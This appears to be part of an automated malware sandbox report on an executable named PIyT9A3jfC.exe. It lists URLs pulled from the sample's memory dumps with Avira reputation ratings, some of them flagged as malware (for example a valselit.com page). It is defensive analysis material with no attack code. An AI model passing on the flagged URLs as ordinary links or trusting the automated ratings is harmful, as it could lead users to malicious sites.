00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.596668740.0000000004000000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                          http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/flipbook.pdfservice.min.js?ver=3.25PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                          https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/termometri/alkoholni-termometri/PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                          http://www.myropcb.com/services-capabilities/pcb-restoration/PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                          http://www.pcgrate.com/wp-content/plugins/pro-elements/assets/js/frontend.min.js?ver=3.3.1PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                          https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/tlacni-vmesniki/PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                          http://chart.apis.google.com/chart?chs=100x100&cht=qr&chld=LPIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            high
                                                                                                                                                                                                                                            http://gmpg.org/xfn/11PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              high
                                                                                                                                                                                                                                              https://www.cloudflare.com/5xx-error-landingPIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.701151400.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.588156336.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.700295143.0000000007F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.586890411.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.586479452.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.587455999.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                                http://www.myropcb.com/services-capabilities/stencil/PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                http://www.evcpa.com/m1PIyT9A3jfC.exe, 00000001.00000003.714841483.0000000001438000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709131137.0000000001438000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.754527325.0000000001438000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                http://www.valselit.com/177-appartement-a-vendre-sigean-30378PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-brands-400.woff2PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                                  http://www.rs-ag.com/.0)vPIyT9A3jfC.exe, 00000001.00000002.894106313.0000000007715000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                  http://hotel-amadeus-frankfurt.de/js/jQuery/jquery-1.9.1.min.jsPIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.669856256.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                  http://hotel-amadeus-frankfurt.de/modules/contentDisplay/contentDisplay.mod.cssPIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.669856256.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                  http://www.myropcb.com/why-use-myro/PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                  https://www.elpro.si/kategorija-izdelka/wika-partner/nivo/pretvorniki-nivoja/PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                  http://www.olras.com/WPIyT9A3jfC.exe, 00000001.00000003.584136385.000000000137D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                                  unknown
